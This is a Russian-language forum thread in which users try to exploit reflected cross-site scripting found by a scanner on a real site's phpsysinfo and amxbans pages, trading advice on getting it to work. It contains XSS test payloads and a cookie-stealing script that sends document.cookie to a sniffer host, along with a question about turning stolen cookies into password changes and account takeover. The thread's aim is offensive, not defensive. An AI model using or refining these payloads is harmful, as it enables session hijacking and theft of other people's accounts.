я просканировал сайт программой и в результате получилось следующие Cross Site Scripting (verified) сайт.ru/phpsysinfo/index.php пытаюсь проверить XSS вот таким способом сайт.ru/phpsysinfo/index.php?=<SCRIPT>alert('XSS')</SCRIPT> но ни каких изменений не происходит, подскажите как реализовать эту уязвимость или ссылку плииз
если не знаем как это делать открываем google.ru вбиваем: phpsysinfo уязвимости сразу же видим первые 5 ссылок открываем получаем подробную инфу что и как. например, так:_http://www.xakep.ru/vulnerability/phpSysInfo/ или так _http://safe.cnews.ru/bugtrack/entry/index.shtml?xploit/2007/07/31/102746 во второй кстати написано что идет xss после слеша, так что пробуй
а вот например угнал кто нибудь куки, он же зайдет уже в авторизованный акк а как можно пароль узнать чтобы пароль сменить, куки в себе содержат сам пароль ака?
вот например ввожу в строке сайт.ru/amxbans/ban_search.php/index.php/"><SCRIPT>alert('XSS')</SCRIPT> появляется окошо - XSS при просмотре кода html видно /amxbans/ban_search.php/index.php/"><SCRIPT>alert('XSS')</SCRIPT>"> если ввожу сайт.ru/index.php/"><script>img=new Image(); img.src="http://снифер.ru/s.gif?"+document.cookie;</script> то данная ссылка не работает и при просмотре HTML страницы видно такое /amxbans/ban_search.php/index.php/"><script>img=new Image();img.src="http://"> отсутствует вот эта чать +document.cookie;</script> я так понимаю баг устранен? или у меня руки кривые?